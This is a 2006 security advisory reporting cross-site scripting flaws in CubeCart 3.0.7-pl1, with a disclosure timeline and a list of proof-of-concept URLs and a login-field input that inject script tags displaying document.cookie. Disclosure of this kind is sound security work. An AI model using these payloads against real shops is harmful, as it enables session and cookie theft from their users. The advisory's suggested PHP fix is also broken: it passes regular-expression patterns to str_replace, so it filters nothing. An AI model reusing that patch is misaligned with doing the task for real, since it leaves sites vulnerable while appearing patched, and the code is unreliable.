cubecartXSS.txt

`################################################  
CubeCart 3.0.7-pl1 multiple variable Cross site scripting  
Vendor url: www.cubecart.com  
bug report:http://bugs.cubecart.com/?do=details&id=459  
Advisore:http://lostmon.blogspot.com/2006/01/  
cubecart-307-pl1-indexphp-multiple.html.  
vendor notify:yes exploit avalable: yes  
################################################  
  
I recomended to all vendors to look this paper..  
This is the new posible impact of XSS atacks:  
  
http://www.bindshell.net/papers/xssv.html  
  
CubeCart contains a flaw that allows a remote cross site scripting  
attack.This flaw exists because the application does not validate  
some variables upon submission to 'index.php' scripts.  
This could allow a user to create a specially crafted URL that  
would execute arbitrary code in a user's browser within the trust  
relationship between the browser and the server,leading to a  
loss of integrity.  
  
###############  
VERSIONS  
###############  
  
CubeCart 3.0.7-pl1 vulnerable.  
Other versions are posible vulnerables too  
  
#################  
Timeline  
#################  
  
Discovered: 24 dec 2005  
vendor notify: 10-01-2006  
Vendor response:  
Solution:  
Disclosure: 10-01-2006  
Public disclosure:16-01-2006  
  
###############  
Examples:  
###############  
  
  
http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt  
by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH  
QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ  
XdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript  
%3Ealert%28document.cookie%29%3C%2Fscript%3E  
  
http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript  
%3Ealert%28document.cookie%29%3C%2Fscript%3E  
  
  
http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript  
%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat  
&Submit=Go  
  
http://[victim]cc3/index.php?act=login&redir=L3NpdG  
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb  
2NJZD0x=%3D%22%3E%3Cscript  
%3Ealert%28document.cookie%29%3C%2Fscript%3E  
  
http://victim]/cc3/index.php?act=viewProd&productId=1"><script>  
alert(document.cookie)</script>  
  
http://victim]/cc3/index.php?act=viewDoc&docId=3"><script>  
alert(document.cookie)</script>  
  
http://victim]/cc3/index.php?act=viewProd"><script>  
alert(document.cookie)</script>  
  
http://victim]/cc3/index.php?act=viewCat&catId=1"><script>  
alert(document.cookie)</script>  
  
http://victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>  
alert(document.cookie)</script>  
  
http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat  
  
http://victim]/cc3/index.php?act=viewDoc&docId=1"><script>  
alert(document.cookie)</script>  
  
#################  
User field XSS  
#################  
Go to http://victim]/cc3/index.php?act=login  
and inser in the username field this: "><script>  
alert(document.cookie)</script>  
  
#############  
SOLUTION  
#############  
  
no solution was available at this time  
  
currently i found a posible fix :  
  
if we look in includes/functions.inc.php for function treatGet($text)  
arround line 85 i change the original code to this other.  
  
it removes all posible html code inserted ...  
  
function treatGet($text){  
$text= str_replace(array ("@<script[^>]*?>.*?</script>@si",  
"@<[\/\!]*?[^<>]*?>@si",  
"@([\r\n])[\s]+@",  
"@&(quot|#34);@i",  
"@&(amp|#38);@i",  
"@&(lt|#60);@i",  
"@&(gt|#62);@i",  
"@&(nbsp|#160);@i",  
"@&(iexcl|#161);@i",  
"@&(cent|#162);@i",  
"@&(pound|#163);@i",  
"@&(copy|#169);@i",  
"@&#(\d+);@e"),"",$text);  
return $text;  
}  
  
close, save and upload the new file...  
  
  
  
arround line 80 in index.php we found :  
  
if(isset($_GET['searchStr'])){  
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));  
} else {  
$body->assign("SEARCHSTR","");  
}  
  
  
this can be replace for:  
  
$_GET['searchStr'] = treatGet($_GET['searchStr']);  
if(isset($_GET['searchStr'])){  
$body->assign("SEARCHSTR",$_GET['searchStr']);  
} else {  
$body->assign("SEARCHSTR","");  
}  
---------------------------------------  
  
close,save and upload it.  
this only fix searchStr param , but you can search in  
the source code for fix the other functions....  
  
  
##################### €nd ########################  
  
Thnx to estrella to be my ligth  
Thnx to all manglers of http://www.osvdb.org  
  
--  
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
--  
La curiosidad es lo que hace mover la mente....  
`